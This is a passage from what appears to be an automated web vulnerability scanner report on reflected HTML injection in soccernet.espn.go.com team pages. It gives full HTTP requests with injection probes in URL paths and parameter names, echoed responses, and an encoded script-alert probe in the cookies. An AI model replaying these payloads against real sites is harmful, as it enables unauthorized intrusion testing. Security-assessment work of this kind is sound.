s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT Content-Length: 81825 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT Content-Length: 81475 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss"> ...[SNIP]...
5.110. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/627/japan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT Content-Length: 81583 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT Content-Length: 82012 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics"> ...[SNIP]...
5.112. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/628/australia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT Content-Length: 82120 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:15 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT Content-Length: 81962 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss"> ...[SNIP]...
5.114. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/656/cameroon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:27 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT Content-Length: 82070 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT Content-Length: 81727 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team"> ...[SNIP]...
5.116. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/657/nigeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
